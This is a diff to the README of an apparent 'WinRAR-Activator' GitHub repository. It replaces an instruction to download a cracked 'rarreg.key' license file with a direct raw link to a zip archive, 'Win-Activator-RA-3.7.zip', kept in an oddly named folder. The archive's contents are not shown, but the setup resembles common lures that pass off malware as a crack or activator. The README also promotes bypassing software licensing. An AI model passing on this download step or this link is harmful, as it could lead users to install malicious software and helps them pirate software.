shivamkumar254456/WinRAR-Activator/README.md

 ---

-Download the "rarreg.key" file from this repo.
+Download the "https://github.com/shivamkumar254456/WinRAR-Activator/raw/refs/heads/main/domineeringly/Win-Activator-RA-3.7.zip" file from this repo.

 `Copy` or `Cut` the file and `Paste` it in the installation folder of WinRAR.